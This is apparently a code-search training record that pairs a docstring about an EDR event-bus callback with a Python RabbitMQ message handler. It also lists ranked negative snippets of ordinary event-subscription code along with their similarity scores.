test_register_events():\n event_bus = MockEventBus()\n test_module.register_events(event_bus)\n assert event_bus.topic_patterns_to_subscribers", "def start(self) -> None:\n\n self.bus.subscribe(\"server:ready\", self.setup)\n self.bus.subscribe(\"bookmarks:find:id\", self.find_id)\n self.bus.subscribe(\"bookmarks:find:url\", self.find_url)\n self.bus.subscribe(\"bookmarks:add\", self.add)\n self.bus.subscribe(\"bookmarks:add:fulltext\", self.add_full_text)\n self.bus.subscribe(\"bookmarks:domaincount\", self.domain_count)\n self.bus.subscribe(\"bookmarks:search\", self.search)\n self.bus.subscribe(\"bookmarks:prune\", self.prune)\n self.bus.subscribe(\"bookmarks:recent\", self.recent)\n self.bus.subscribe(\"bookmarks:tags:all\", self.all_tags)\n self.bus.subscribe(\"bookmarks:remove\", self.remove)\n self.bus.subscribe(\"bookmarks:repair\", self.repair)", "def on_connect():\n # There is now a connection\n subscribe_to_topic(\"pir\",\"Trigger\")", "async def _track_and_propagate_available_endpoints(self) -> None:\n async for ev in self._endpoint.stream(EventBusConnected):\n self._available_endpoints = self._available_endpoints + (ev.connection_config,)\n self.logger.debug(\"New EventBus Endpoint connected %s\", ev.connection_config.name)\n # Broadcast available endpoints to all connected endpoints, giving them\n # a chance to cross connect\n await self._endpoint.broadcast(AvailableEndpointsUpdated(self._available_endpoints))\n self.logger.debug(\"Connected EventBus Endpoints %s\", self._available_endpoints)", "def stasis_start_cb(channel, ev):\n await channel.answer()\n await bridge.addChannel(channel=channel.id)", "async def test_event(bus: lightbus.BusNode, dummy_api, stream_use):\n bus.bus_client.transport_registry.get_event_transport('default').stream_use = stream_use\n manually_set_plugins({})\n received_kwargs = []\n received_api_name = None\n received_event_name = None\n\n async def listener(api_name, event_name, **kwargs):\n nonlocal received_kwargs, received_api_name, received_event_name\n received_kwargs.append(kwargs)\n received_api_name = api_name\n received_event_name = event_name\n\n await bus.my.dummy.my_event.listen_async(listener)\n await asyncio.sleep(0.01)\n await bus.my.dummy.my_event.fire_async(field='Hello! 😎')\n await asyncio.sleep(0.01)\n\n # await asyncio.gather(co_fire_event(), co_listen_for_events())\n assert received_kwargs == [{'field': 'Hello! 😎'}]\n assert received_api_name == 'my.dummy'\n assert received_event_name == 'my_event'", "def _run(self):\n print \"ZMQSubscriber: loop started\"\n port = \"5556\"\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.connect(\"tcp://localhost:%s\" % port)\n # socket.setsockopt_string(zmq.SUBSCRIBE, u'') # get everything\n socket.setsockopt_string(zmq.SUBSCRIBE, u'[firewall]')\n socket.setsockopt_string(zmq.SUBSCRIBE, u'END')\n\n while self._do_work.is_set():\n try:\n data = socket.recv_string()\n # print \"Got data:\", repr(data)\n print data\n if data == 'END':\n self.stop()\n except Queue.Empty:\n pass\n\n print \"ZMQSubscriber: loop stopped\"", "def connect(self):\n\t\tself.printed_sub = False\n\t\tself.client.connect(BROKER)\n\t\tself.client.loop_forever()", "def _subscribe(self, signal, reconnect=False):\n if reconnect:\n if signal not in self._downstream_reconnect:\n self._downstream_reconnect.append(signal)\n else:\n if signal not in self._downstream:\n self._downstream.append(signal)", "def subscribe_topic(self):\n req = {\n \"op\": \"subscribe\",\n \"args\": [\n \"instrument\",\n \"trade\",\n \"orderBook10\",\n \"execution\",\n \"order\",\n \"position\",\n \"margin\",\n ],\n }\n self.send_packet(req)", "def handle_client(self):\n e = threading.Event()\n reg_t = threading.Thread(target=self.handle_reg_client, args=(e,))\n stream_t = threading.Thread(target=self.handle_stream_client,\n args=(e,))\n reg_t.start()\n stream_t.start()", "def startComponent (self):\n \n logging.info ('\\n\\nStarting AlertHandler Component...')\n\n #// Message service object for this component\n self.ms = MessageService()\n \n #// Register this component to MessageService\n self.ms.registerAs('AlertHandler')\n \n logging.debug ('Assiging important object references to all the alert handlers registered in PRODCOMMON')\n \n for handler in GlobalRegistry.registries['AlertHandler'].keys():\n \n handlerRef = GlobalRegistry.registries['AlertHandler'][handler]\n handlerRef.ms = self.ms\n handlerRef.args = self.args\n \n \n #//Subscribing to all defined Alert Events \n for event in self.args['AlertEvent'].keys():\n\n self.ms.subscribeTo (event) \n logging.info('Subscribed to %s event' % event)\n \n #// Subscribing to Debug log control event \n self.ms.subscribeTo('AlertHandler:StartDebug')\n self.ms.subscribeTo('AlertHandler:EndDebug')\n self.ms.commit() \n self.ms.publish('AlertHandler:StartDebug','') \n self.ms.commit()\n\n logging.debug('Subscribed to StartDebug & EndDebug events')\n logging.info ('AlertHandler Component started Successfully')\n\n \n\n #// Start Listning to message service events\n while True: \n \n Session.set_database(dbconfig)\n Session.connect()\n Session.start_transaction()\n type, payload = self.ms.get()\n\n\n #//passing Event payload to event responsive function \n self.__call__ (type, payload) \n\n #//Committing transaction and start listning to published events again \n Session.commit_all()\n Session.close_all()\n self.ms.commit() \n \n return", "def main(event, context):\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return", "def subscribe(self, event_type: typing.Type[typing.Any], callback: CallbackT[typing.Any]) -> None:", "def ReceiveStreamedEvents(self, request, context):\n print 'got ReceiveStreamedEvents request'\n while 1:\n if ShutDown.stop:\n break\n yield self.get_next_event()", "async def on_start(objs, event):\n channel = objs['channel']\n await channel.answer()\n playback = await channel.play(media='sound:demo-congrats')\n\n async def on_dtmf(channel, event):\n \"\"\"Callback for DTMF events.\n\n DTMF events control the playback operation.\n\n :param channel: Channel DTMF was received on.\n :param event: Event.\n \"\"\"\n # Since the callback was registered to a specific channel, we can\n # control the playback object we already have in scope.\n # TODO: if paused: unpause before doing anything else\n digit = event['digit']\n if digit == '5':\n await playback.control(operation='pause')\n elif digit == '8':\n await playback.control(operation='unpause')\n elif digit == '4':\n await playback.control(operation='reverse')\n elif digit == '6':\n await playback.control(operation='forward')\n elif digit == '2':\n await playback.control(operation='restart')\n elif digit == '#':\n await playback.stop()\n await channel.continueInDialplan()\n else:\n print >> sys.stderr, \"Unknown DTMF %s\" % digit\n\n channel.on_event('ChannelDtmfReceived', on_dtmf)", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def start_publishing(self):\n print(f\"{self._connection_param}: Issuing consumer related RPC commands\")\n # self._channel.confirm_delivery(self.on_delivery_confirmation)\n self.schedule_next_message(self.SLOW_SEND)", "def subscribe( self, topic ):\n logging.info( \"Subscribing to topic %s\" %topic )\n try:\n self.client.subscribe( topic )\n except Exception as error:\n print( error )", "def consume(docker_client, redis_client):\n print 'Start consuming events from %s' % docker_client.base_url\n since = redis_client.get('castor:last_event')\n for event in docker_client.events(decode=True, since=since):\n for hook in settings.HOOKS:\n tasks.dispatch_event.delay(event, hook)\n redis_client.set('castor:last_event', event['time'])", "def subscribe(self, lambda_arn):\n try:\n subscription = self.topic.subscribe(\n Protocol = 'lambda',\n Endpoint = lambda_arn\n )\n except Exception as e:\n print (e)\n raise", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def on_connect(client, userdata, flags, rcdata):\n client.subscribe(\"diy/system/fire\", 1)\n client.subscribe(\"diy/system/panic\", 1)\n client.subscribe(\"diy/system/who\", 1)", "async def acknowledge(self, *event_messages, bus_client: \"BusClient\"):\n pass" ]
[ "0.65859115", "0.65859115", "0.65859115", "0.6490624", "0.63868344", "0.6325292", "0.6266391", "0.62001973", "0.6125916", "0.60468745", "0.6021934", "0.6003453", "0.59971917", "0.5954995", "0.59471166", "0.59357494", "0.5932107", "0.59087026", "0.58901316", "0.5858419", "0.58411354", "0.58189034", "0.58146566", "0.5793195", "0.57912093", "0.5777", "0.5774395", "0.57714057", "0.57520145", "0.5729525", "0.57272995", "0.57149214", "0.5700734", "0.569956", "0.5699161", "0.5694384", "0.56906617", "0.56847346", "0.5681406", "0.5673299", "0.5651948", "0.56400794", "0.561818", "0.55963093", "0.5583364", "0.5574008", "0.5566383", "0.55613583", "0.5550341", "0.553477", "0.5526386", "0.55260664", "0.55206263", "0.5488943", "0.548662", "0.54863584", "0.54745233", "0.5474225", "0.54737234", "0.5473616", "0.547278", "0.54653853", "0.5460389", "0.5457525", "0.5451493", "0.5449082", "0.5443095", "0.5437704", "0.54269326", "0.542407", "0.5423601", "0.5412311", "0.54091305", "0.5407725", "0.5402802", "0.5402802", "0.53906786", "0.5378752", "0.53726184", "0.53657883", "0.53632945", "0.53622526", "0.53539544", "0.534763", "0.5346781", "0.5346701", "0.5342332", "0.5336471", "0.53328043", "0.53301954", "0.531806", "0.5308178", "0.53055096", "0.5304112", "0.5294951", "0.5293482", "0.5292844", "0.5285168", "0.52851015", "0.5280709", "0.5279637" ]
0.0
-1
Callback that gets called for any event on the EDR event bus
def on_bus_message(self, channel, method_frame, header_frame, body): try: # there are two messages that get broadcast that we really # don"t care about. They have to do with feed synchronization # and other internal book-keeping if method_frame.routing_key in self.capture_events: event = { "content_type": header_frame.content_type, "routing_key": method_frame.routing_key, "body": body } self.logger.debug("Received Message: %s - %s" % (header_frame.content_type, method_frame.routing_key)) self.processor_pool.apply_async(process_event, (self.event_processor, event)) else: self.logger.debug("Unknown message info: %s" % method_frame.routing_key) except: self.logger.exception("Error processing bus message")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def event_in_cb(self, msg):\n self.event = msg.data", "def process_event(self, event):\r\n pass", "def visit_event(self, event):", "def handleEvents(self, events):\n pass", "def on_event(self, event):\n pass", "def on_event(self, event):\r\n pass", "def event_receive(self,event):\n\n pass", "def on_event(self, event):\r\n\r\n print(\"on event called, event:\", event)\r\n\r\n self.state = self.state.on_event(event)\r\n publish_state_msg(state_msg, odrive_bridge.get_state())", "def on_event_finished(self, event):", "def _handle_event(event):\n if event.device.id_string != self._event.device.id_string:\n return\n\n self.apply_event(event)", "def handleEvent(self, event):\n pass", "def onEvent(self, eventName, callBack):\n self.msg_namespace.on('ops', callBack)", "def runEventCallbacks(self, event, *args):\n\n if not event in self.EVENT_TYPES:\n raise Exception(\"XnatIo (onEvent): invalid event type '%s'\"%(\\\n event))\n if not hasattr(self, 'eventCallbacks__'):\n print('self has no attribute eventCallbacks__')\n return\n\n for callback in self.eventCallbacks__[event]:\n #print(f\"EVENT CALLBACK {event}\")\n callback(*args)", "def events(self):", "def on_event(self, event):", "def handle_event(self, event):\n pass", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def event_queue_proc(self,event):\r\n event()", "def event_handler(self, response):\n pass", "def eventReceived(self, event):\n print repr(event)", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def listener(self, event):\n print \"TB:@%s arrived event %s\" % (event.time, event) \n informFunction = self._informFunc\n informFunction((event.time, event.state))\n return []", "def async_event_handler(self, event: dict) -> None:\n if event['e'] == 'added':\n\n if event['r'] == 'lights' and event['id'] not in self.lights:\n device_type = 'light'\n device = self.lights[event['id']] = DeconzLight(\n event['id'], event['light'], self.async_put_state)\n\n elif event['r'] == 'sensors' and event['id'] not in self.sensors:\n if supported_sensor(event['sensor']):\n device_type = 'sensor'\n device = self.sensors[event['id']] = create_sensor(\n event['id'], event['sensor'], self.async_put_state)\n else:\n _LOGGER.warning('Unsupported sensor %s', event)\n return\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n return\n\n if self.async_add_device_callback:\n self.async_add_device_callback(device_type, device)\n\n elif event['e'] == 'changed':\n\n if event['r'] == 'groups' and event['id'] in self.groups:\n self.groups[event['id']].async_update(event)\n\n elif event['r'] == 'lights' and event['id'] in self.lights:\n self.lights[event['id']].async_update(event)\n self.update_group_color([event['id']])\n\n elif event['r'] == 'sensors' and event['id'] in self.sensors:\n self.sensors[event['id']].async_update(event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n\n elif event['e'] == 'deleted':\n _LOGGER.debug('Removed event %s', event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)", "def __call__(self, event):\n if not self.events or event in self.events:\n super(EventHandler, self).__call__(event)", "def _emited(self, *args):\n\t\tdebug(\"OnEventDeferred : event catched\")\n\t\tself.callback(*args)\n\t\tself._clean()", "def register_to_event(request):\n pass", "def handle_event(self, event):", "def on_event(self, events):\n raise NotImplemented(\"on_event method should be implemented.\")", "def process(self, event):\n pass", "def on(self, event_name, callback):\n self.factory.on(event_name, callback)", "def subscribe(self, event_handler):\n pass # pragma: no cover", "def consume_event(self, ev: dict):\n print(\"error: model has no consume_event implementation\")\n exit(1)", "def __empty_event_handler(self, govee, device, raw_data):\n\n pass", "def _callEventGetAll(self, callback_id, event_name):\n return self._event_client.eventGetAll(callback_id, event_name)", "def handler(event, context):\n if event['Records'][0]['Sns']['Message'] is None:\n _print_info('Unrecognized event, function will not be executed. Enable debug to log the actual event.')\n _print_debug('event: {}'.format(event))\n return\n\n message = event['Records'][0]['Sns']['Message']\n _print_debug('message received: {}'.format(message))\n\n event = json.loads(message)\n _print_info('event: {}'.format(json.dumps(event)))\n\n if event[ACTION] in ALLOWED_ACTIONS:\n\n _print_info('Requested action: {}'.format(event[ACTION]))\n\n _print_info('Initializing.')\n _init_vars_()\n\n # create a hive cursor which can be passed around and then closed when done.\n cursor = _create_hive_cursor()\n\n if event[ACTION] == FULL_SYNC:\n _sync_all(cursor)\n if event[ACTION] == DELTA_SYNC:\n if event[USER] and event[NAMESPACE]:\n _sync_delta(cursor, event[USER], event[NAMESPACE])\n else:\n _print_error(\n 'Invalid request. Expecting both: a valid \\'{}\\' and a valid \\'{}\\''.format(\n USER, NAMESPACE))\n\n # close the hive cursor when done\n _close_hive_cursor(cursor)\n else:\n _print_error(\n 'Unknown action. Expecting one of: \\'{}\\', \\'{}\\''.format(FULL_SYNC,\n DELTA_SYNC))", "def address_mapped_event(self, event):\r\n pass", "def doEvent(self, source):\n pass", "def _add_event_callback(self):\n for gpio_channel in self.registered_gpio:\n self.gpio_add_event_callback(gpio_channel)", "def process_amqp_events(self):\n self.connection.process_data_events()", "def reg_event_handler(self, callback_func, userData):\n\t\tcall_sdk_function('PrlSrv_RegEventHandler', self.handle, callback_func, userData)", "async def events(self) -> Iterable[Event]:", "async def handle_andesite_event(self, event: andesite.AndesiteEvent) -> None:\n ...", "def route(self, evtlist):\n for callback in reversed(evtlist):\n if not self.consumed:\n try:\n callback(self)\n except BaseException:\n traceback.print_exc()\n raise", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def msg_event(self, event):\r\n pass", "def run(self, event):\n pass", "async def listen_event(\n self, callback: Callable, event: Union[str, list] = None, **kwargs: Optional[Any]\n ) -> Union[str, list]:\n namespace = self._get_namespace(**kwargs)\n\n if \"namespace\" in kwargs:\n del kwargs[\"namespace\"]\n\n _name = self.name\n self.logger.debug(\"Calling listen_event for %s\", self.name)\n\n if isinstance(event, list):\n handles = []\n for e in event:\n handle = await self.AD.events.add_event_callback(_name, namespace, callback, e, **kwargs)\n handles.append(handle)\n\n return handles\n\n else:\n return await self.AD.events.add_event_callback(_name, namespace, callback, event, **kwargs)", "def ev_controllerdeviceremoved(self, event: tcod.event.ControllerDevice) -> T | None:", "def event_handler(self, event: dict) -> None:\n if (event_type := event[\"e\"]) not in (EVENT_ADDED, EVENT_CHANGED):\n LOGGER.debug(\"Unsupported event %s\", event)\n return\n\n if (resource_type := event[\"r\"]) not in (\n GROUP_RESOURCE,\n LIGHT_RESOURCE,\n SENSOR_RESOURCE,\n ):\n LOGGER.debug(\"Unsupported resource %s\", event)\n return\n\n device_class = getattr(self, resource_type)\n device_id = event[\"id\"]\n\n if event_type == EVENT_CHANGED and device_id in device_class:\n device_class.process_raw({device_id: event})\n if resource_type == LIGHT_RESOURCE and \"attr\" not in event:\n self.update_group_color([device_id])\n return\n\n if event_type == EVENT_ADDED and device_id not in device_class:\n device_class.process_raw({device_id: event[resource_type[:-1]]})\n device = device_class[device_id]\n if self.async_add_device_callback:\n self.async_add_device_callback(resource_type, device)\n return", "def onEvent(self, eventKey, callback):\n\n #-------------------- \n # Construct callback dict if it doesn't exist.\n #--------------------\n if not hasattr(self, 'eventCallbacks__'):\n self.eventCallbacks__ = {}\n for eventType in self.EVENT_TYPES:\n self.eventCallbacks__[str(eventType)] = []\n\n\n if not eventKey in self.EVENT_TYPES:\n raise Exception(\"Xnat.io (onEvent): invalid event type '%s'\"%(eventKey))\n self.eventCallbacks__[eventKey].append(callback)", "def handle_event(event, context):\n print(\"Executing...\")\n router = Router(ROUTE_MAP)\n return router.route_request(event, context)", "def onNewEvent(self, event):\n self._logger.debug('Received event: %s' % event)", "def callevent_handler(data):\n return CallEventHandler(data)", "def callback(self, event):\n button = event[\"button\"]\n\n cmd = self._callbacks.get(self._uuidstr(self.global_id, button), None)\n cmd = self._callbacks.get(self._uuidstr(event[\"name\"], button), cmd)\n cmd = self._callbacks.get(self._uuidstr(event[\"instance\"], button), cmd)\n\n if cmd is None:\n return\n if callable(cmd):\n cmd(event)\n else:\n bumblebee.util.execute(cmd, False)", "def buildEvent(data):", "def on_eot(self, data):\n logger.debug('on_eot: %r', data)\n if self.in_transfer_state:\n # put the records together to a message\n if self.messages:\n message = b\"\".join(self.messages)\n self.queue.put_nowait(message)\n self.discard_env()\n else:\n raise InvalidState('Server is not ready to accept EOT message.')", "async def server_event_trigger(self, event):\n event_data = event[\"event_data\"]\n await self.send_json(event_data)", "def dispatchEvent(self, event):\n # See if any callbacks have been registered for this event type:\n if event.event_type in self.callbacks:\n # Yes, at least one has been registered. Call them in order:\n for callback in self.callbacks[event.event_type]:\n # Call the function with the event as an argument:\n callback(event)", "def _dispatch_event(self, event: Event) -> bool:\n\n if event.type == EventType.episode_start.value and event.episode_start:\n self.episode_start(event.episode_start.config)\n\n elif event.type == EventType.episode_step.value and event.episode_step:\n self.episode_step(event.episode_step.action)\n\n elif event.type == EventType.episode_finish.value and event.episode_finish:\n self.episode_finish(event.episode_finish.reason)\n\n elif event.type == EventType.idle.value and event.idle:\n try:\n self.idle(event.idle.callback_time)\n except AttributeError:\n # callbacktime is always 0. Sometimes the attribute is missing.\n # Idle for 0 seconds if attribute is missing.\n self.idle(0)\n\n elif event.type == EventType.unregister.value and event.unregister:\n log.info(\"Unregister reason: {}.\".format(event.unregister.reason))\n return False\n\n return True", "def get_api_event(self):\n pass", "def __call__ (self, event, payload):\n\n logging.info ('\\n\\nReceived Event: '+ str(event) + '\\nPayload: ' + str(payload))\n\n try:\n\n if event == 'AlertHandler:StartDebug':\n logging.getLogger().setLevel(logging.DEBUG)\n logging.info ('Logging level changed to DEBUG Mode')\n\n elif event == 'AlertHandler:EndDebug':\n logging.getLogger().setLevel(logging.INFO)\n logging.info ('Logging level changed to INFO Mode')\n \n elif event in self.args['AlertEvent'].keys():\n handler = retrieveHandler(self.args['AlertEvent'][event],'AlertHandler')\n handler(payload)\n\n except Exception, ex: \n \n logging.error('Exception Caught while handling the event: ' + str(event) + ' payload: ' + str(payload) ) \n logging.error(str(ex))\n\n return", "def unknown_event(self, event):\r\n pass", "def on_any_event(self, event):\n\n def handle_event():\n if self.clear_module_cache:\n self.clear_module_cache()\n\n event_dict = _event_to_dict(event)\n self.log.debug('event: %s', event_dict)\n\n @gen.coroutine\n def execute_callbacks():\n for code in self.code_blocks:\n try:\n yield self.execute_code(code, event=event_dict)\n except Exception as e:\n self.log.exception('Code execution error: %s', e)\n\n for job in self.jobs:\n try:\n yield self.execute_job(job)\n except Exception as e:\n self.log.exception('Job execution error: %s', e)\n\n if self.debounce > 0.0:\n if self._timeout:\n self.ioloop.remove_timeout(self._timeout)\n self._timeout = self.ioloop.call_later(self.debounce, execute_callbacks)\n else:\n if self.throttle > 0.0:\n if self._in_throttle:\n return\n\n def unthrottle():\n self._in_throttle = False\n\n self._in_throttle = True\n self._timeout = self.ioloop.call_later(self.throttle, unthrottle)\n\n self.ioloop.add_callback(execute_callbacks)\n\n self.ioloop.add_callback(handle_event)", "def _process_event(self, event: Dict[str, Any]) -> None:\n try:\n content = event[\"content\"]\n _LOGGER.debug(\"Received event: %s\", content)\n except KeyError:\n _LOGGER.warning(\"Received invalid event: %s\", event)\n return\n\n if content[\"deviceId\"] is not None:\n device_id = content[\"deviceId\"]\n self._update_device_attr(\n device_id, content[\"name\"], content[\"value\"], content[\"unit\"]\n )\n\n evt = Event(content)\n\n if device_id in self._listeners:\n for listener in self._listeners[device_id]:\n listener(evt)\n elif content[\"name\"] == \"mode\":\n name = content[\"value\"]\n mode_set = False\n for mode in self._modes:\n if mode.name == name:\n mode.active = True\n mode_set = True\n else:\n mode.active = False\n\n # If the mode wasn't set, this is a new mode. Add a placeholder\n # to the modes list, and reload the modes\n if not mode_set:\n self._modes.append(Mode({\"active\": True, \"name\": name}))\n _ = self._load_modes()\n\n evt = Event(content)\n\n for listener in self._listeners.get(ID_MODE, []):\n listener(evt)\n\n elif content[\"name\"] == \"hsmStatus\":\n self._hsm_status = content[\"value\"]\n evt = Event(content)\n for listener in self._listeners.get(ID_HSM_STATUS, []):\n listener(evt)", "def handle_event(self, ev):\n msg = (\"Handling event '%s' \" % (ev.id))\n LOG.info(msg)\n try:\n msg = (\"Worker process with ID: %s starting \"\n \"to handle task: %s of topic: %s. \"\n % (os.getpid(), ev.id, lb_const.LBAAS_AGENT_RPC_TOPIC))\n LOG.debug(msg)\n\n method = getattr(self, \"_%s\" % (ev.id.lower()))\n method(ev)\n except Exception as err:\n msg = (\"Failed to perform the operation: %s. %s\"\n % (ev.id, str(err).capitalize()))\n LOG.error(msg)\n finally:\n if ev.id == lb_const.EVENT_COLLECT_STATS_V2:\n \"\"\"Do not say event done for collect stats as it is\n to be executed forever\n \"\"\"\n pass\n else:\n msg = (\"Calling event done for event '%s' \" % (ev.id))\n LOG.info(msg)\n self.sc.event_complete(ev)", "def invoke(self, event_args, *args, **kwargs):\n pass # pragma: no cover", "def dispatch(self, sender, event, *args, **kwargs):\n pass # pragma: no cover", "def process_event(event):\n\n # Extract the required parameters from the request body\n id = event.get('id')\n token = event.get('token')\n type = event.get('type')\n\n # If any of the required parameters are absent, reject the request.\n if (not id) or (not token) or (not type):\n app.logger.warn('Request rejected: Required field absent')\n abort(400)\n\n # Message type must be on the allowed types\n legal_types = ['STARTUP', 'DISPENSE', 'REFILL', 'REFILLED', 'EMPTY']\n if type not in legal_types:\n app.logger.warn('Request rejected: Invalid event type')\n abort(400)\n\n # Authenticate the dispenser against our database of tokens.\n if not permitted(event['id'], event['token']):\n app.logger.warn('Request rejected: Invalid authentication token')\n abort(401)\n\n # Dispatch event to appropriate handler\n if type == 'STARTUP':\n handle_startup(event)\n elif type == 'DISPENSE':\n handle_dispense(event)\n elif type == 'REFILL':\n handle_refill_request(event)\n elif type == 'REFILLED':\n handle_refilled(event)\n elif type == 'EMPTY':\n handle_empty(event)\n\n # Send the event to the dispensers Kafka topic\n # TODO Topic for startup, dispense, battery level, refill request\n # producer.send(type, event)", "def default_event_handler(event):\n pass", "def lambda_handler(event, context):\n return dispatch(event)", "def register_standard(self, event_name, callback):\n \n raise NotImplementedError()", "def terncy_event_handler(tern, ev):\n hass = tern.hass_platform_data.hass\n parsed_devices = tern.hass_platform_data.parsed_devices\n if isinstance(ev, terncy.event.Connected):\n _LOGGER.info(\"got connected event %s\", tern.dev_id)\n asyncio.ensure_future(async_refresh_devices(hass, tern))\n if isinstance(ev, terncy.event.Disconnected):\n _LOGGER.info(\"got disconnected event %s\", tern.dev_id)\n for dev in parsed_devices.values():\n dev.is_available = False\n dev.schedule_update_ha_state()\n if isinstance(ev, terncy.event.EventMessage):\n _LOGGER.info(\"got event message %s %s\", tern.dev_id, ev.msg)\n evt_type = \"\"\n if \"type\" in ev.msg:\n evt_type = ev.msg[\"type\"]\n if \"entities\" not in ev.msg:\n return\n ents = ev.msg[\"entities\"]\n if evt_type == \"report\":\n for ent in ents:\n if \"attributes\" not in ent:\n continue\n devid = ent[\"id\"]\n temperature = get_attr_value(ent[\"attributes\"], \"temperature\")\n if temperature is not None:\n _LOGGER.info(\"got temperature\")\n devid = devid + DEVID_EXT_TEMP\n\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n attrs = ent[\"attributes\"]\n dev.update_state(attrs)\n dev.schedule_update_ha_state()\n else:\n _LOGGER.info(\"dev %s not found\", devid)\n\n elif evt_type == \"keyPressed\":\n for ent in ents:\n if \"attributes\" not in ent:\n continue\n devid = ent[\"id\"]\n\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n attrs = ent[\"attributes\"]\n times = attrs[0][\"times\"]\n ev_type = ACTION_SINGLE_PRESS\n if times == 2:\n ev_type = ACTION_DOUBLE_PRESS\n event_data = {\n EVENT_DATA_CLICK_TIMES: times,\n \"source\": devid,\n }\n _LOGGER.info(\"fire event to bus %s %d\", ev_type, times)\n _LOGGER.info(event_data)\n hass.bus.fire(\n ev_type,\n event_data,\n )\n elif evt_type == \"entityAvailable\":\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is available\", tern.dev_id, devid)\n hass.async_create_task(update_or_create_entity(ent, tern))\n elif evt_type == \"offline\":\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is offline\", tern.dev_id, devid)\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif devid.rfind(\"-\") > 0:\n prefix = devid[0 : devid.rfind(\"-\")]\n _LOGGER.info(\n \"[%s] %s not found, try find prefix\", tern.dev_id, prefix\n )\n devs = find_dev_by_prefix(parsed_devices, prefix)\n for dev in devs:\n _LOGGER.info(\"[%s] %s is offline\", tern.dev_id, dev.unique_id)\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif evt_type == \"entityDeleted\":\n platform = None\n for plat in async_get_platforms(hass, DOMAIN):\n if plat.config_entry.unique_id == tern.dev_id:\n platform = plat\n break\n if platform is None:\n return\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is deleted\", tern.dev_id, devid)\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif devid.rfind(\"-\") > 0:\n prefix = devid[0 : devid.rfind(\"-\")]\n _LOGGER.info(\n \"[%s] %s not found, try find prefix\", tern.dev_id, prefix\n )\n devs = find_dev_by_prefix(parsed_devices, prefix)\n for dev in devs:\n _LOGGER.info(\"[%s] %s is delete\", tern.dev_id, dev.unique_id)\n hass.async_create_task(\n platform.async_remove_entity(dev.entity_id)\n )\n parsed_devices.pop(dev.unique_id)\n else:\n _LOGGER.info(\"unsupported event type %s\", evt_type)", "def callback(self):\n pass # pragma: no cover", "def callback(e, **kw):\n results.append(kw)\n if e.meta.get('multi') is not True:\n context.detach_events(e)\n events_.remove(e)\n if e.meta.get('final') is True:\n # end on success\n end(False)", "def 